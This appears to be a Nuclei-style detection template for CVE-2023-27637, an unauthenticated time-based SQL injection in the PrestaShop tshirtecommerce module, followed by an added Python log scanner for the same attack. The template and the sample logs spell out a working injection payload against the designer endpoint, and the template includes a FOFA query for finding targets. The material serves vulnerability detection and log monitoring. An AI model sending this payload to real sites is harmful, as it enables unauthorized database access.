Vulnerability Description
The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the designer endpoint, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database.
id: CVE-2023-27637

info:
  name: PrestaShop `tshirtecommerce` Module - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the designer endpoint, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database.
  remediation: |
    Update the tshirtecommerce module to the latest version and apply all security patches.
  reference:
    - https://security.friendsofpresta.org/module/2023/03/21/tshirtecommerce_cwe-89.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27637
    - https://codecanyon.net/item/prestashop-custom-product-designer/19202018
    - https://tshirtecommerce.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27637
    cwe-id: CWE-89
    epss-score: 0.4973
    epss-percentile: 0.97741
    cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:2.1.4:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 1
    vendor: tshirtecommerce
    product: custom_product_designer
    framework: prestashop
    fofa-query: body="Prestashop" && body="tshirtecommerce"
  tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli

http:
  - raw:
      - |
        @timeout: 30s
        GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=8"
          - "status_code == 200"
          - "contains(tolower(body), 'product not found')"
        condition: and
# digest: 490a004630440220658ed298c652b738964c9c8ab26220e56ece3dd2d7606f080652ecd110f144e1022010bd170681212c568e3d23660ab524fe8e161932c23e5459962b32862fb09efb:922c64590222798bb761d5b6d8e72950
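A log check for the request pattern the template above sends, added here as an example and not part of the template or the module: it flags requests to the designer endpoint whose `product_id` or `parent_id` is not a plain integer. The access-log layout, the integer-only rule for both parameters, and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint and parameter names come from the template's request line.
ENDPOINT = "/module/tshirtecommerce/designer"
ID_PARAMS = ("product_id", "parent_id")
# Assumption: access-log lines carry the request as "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate values for both parameters are plain integers.
INTEGER_RE = re.compile(r"\d{1,20}")


def suspicious_params(log_line):
    """Return {param: decoded value} for ID parameters that are not plain integers."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    target = urlsplit(match.group(1))
    # endswith() also covers a language prefix such as /en/module/...
    if not target.path.rstrip("/").endswith(ENDPOINT):
        return {}
    hits = {}
    # separator="&" keeps ';' inside the value; parse_qsl percent-decodes it.
    for name, value in parse_qsl(target.query, keep_blank_values=True, separator="&"):
        if name in ID_PARAMS and not INTEGER_RE.fullmatch(value):
            hits[name] = value
    return hits


def scan(lines):
    """Return (line_number, hits) for every flagged line, numbering from 1."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        hits = suspicious_params(line)
        if hits:
            flagged.append((number, hits))
    return flagged


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2023:10:00:00 +0000] "GET /module/tshirtecommerce/designer?product_id=12&parent_id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Apr/2023:10:00:05 +0000] "GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Apr/2023:10:00:09 +0000] "GET /en/module/tshirtecommerce/designer?product_id=12%20x&parent_id=1 HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Apr/2023:10:01:00 +0000] "GET /index.php?id_product=7 HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer ID parameter(s): {hits}")
```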